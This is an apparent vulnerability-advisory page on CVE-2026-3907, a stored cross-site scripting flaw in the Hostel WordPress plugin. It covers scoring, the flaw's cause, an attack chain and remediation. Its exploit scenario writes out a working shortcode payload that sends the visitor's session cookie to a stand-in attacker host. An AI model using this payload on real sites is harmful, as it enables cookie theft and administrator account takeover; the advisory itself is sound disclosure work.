Skip to main content

Hostel WordPress Plugin CVE-2026-3907

| EUVDEUVD-2026-42842 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-07-10 Wordfence GHSA-9hmh-43jg-fm2x
6.4
CVSS 3.1 · Vendor: Wordfence
Share

Severity by source

Vendor (Wordfence) PRIMARY
6.4 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
vuln.today AI
5.4 MEDIUM

PR:L confirmed by required Contributor account; UI:R applied because a victim must visit the injected page to trigger payload execution; S:C reflects cross-browser scope change inherent to stored XSS.

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N

Primary rating from Vendor (Wordfence).

CVSS VectorVendor: Wordfence

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Analysis Generated
Jul 10, 2026 - 09:19 vuln.today
CVE Published
Jul 10, 2026 - 07:48 cve.org
MEDIUM 6.4

DescriptionCVE.org

The Hostel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wphostel-book' shortcode in all versions up to and including 1.1.7. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes. Specifically, the second shortcode attribute (used as button text) is passed to the $text variable without sanitization at line 79 and then output directly into an HTML value attribute at line 91 without esc_attr() or any other escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

AnalysisAI

Stored Cross-Site Scripting in the Hostel WordPress plugin (all versions through 1.1.7) permits authenticated Contributor-level users to permanently inject arbitrary JavaScript into WordPress pages via the second attribute of the wphostel-book shortcode, which is passed unsanitized to the $text variable and rendered raw into an HTML value attribute without esc_attr() escaping. Any user who subsequently views an injected page will execute the attacker's payload in their browser, enabling session hijacking or privilege escalation against higher-privileged site users. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Obtain Contributor-level WordPress account
Delivery
Craft malicious wphostel-book shortcode with XSS payload as button text attribute
Exploit
Insert shortcode into post or page
Execution
Administrator or privileged user visits injected page
Persist
Stored XSS payload executes in victim browser
Impact
Session cookie exfiltrated or admin actions performed on victim's behalf

Vulnerability AssessmentAI

Exploitation Exploitation strictly requires an authenticated user account with Contributor-level WordPress role or higher - unauthenticated exploitation is not possible, as confirmed by the PR:L CVSS metric. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 score of 6.4 (Medium) reflects the real-world nuance well: the network vector (AV:N) and low complexity (AC:L) confirm the exploit requires no unusual conditions once the attacker has access, but the Low Privilege requirement (PR:L) is the critical limiting factor - the attacker must hold at minimum a Contributor-level WordPress account. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who has registered or compromised a Contributor-level account on the target WordPress site creates a new post and inserts `[wphostel-book "" "<script>document.location='https://attacker.tld/?c='+document.cookie</script>"]` as the shortcode, publishing it or saving it as a draft. When a site administrator reviews or approves the post, their browser executes the injected script, delivering their session cookie to the attacker and enabling full administrative account takeover. …
Remediation A fix commit has been pushed to the Hostel plugin trunk in the WordPress plugin repository, as indicated by the changeset reference at https://plugins.trac.wordpress.org/changeset?reponame=&old=3480942%40hostel&new=3480942%40hostel; however, no specific patched release version number (e.g., 1.1.8 or later) is independently confirmed from the available data - site administrators should update to the latest available version via the WordPress admin dashboard and verify the installed version exceeds 1.1.7. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-3907 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy